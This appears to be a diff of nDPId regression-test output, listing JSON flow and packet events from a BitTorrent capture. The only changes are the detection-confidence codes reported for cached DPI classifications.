00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="} 01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="} 01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"} 00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="} @@ -65,72 +65,72 @@ 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 